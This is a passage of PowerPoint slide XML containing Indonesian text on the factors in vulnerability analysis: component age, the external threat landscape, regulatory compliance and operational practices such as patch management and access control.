              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompleksitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>usia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen-komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lanskap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksternal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Prevalensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ransomware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>medis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>regulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perawatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keuangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukuman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksposur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memengaruhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berhasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Contohnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buruk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>buruk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
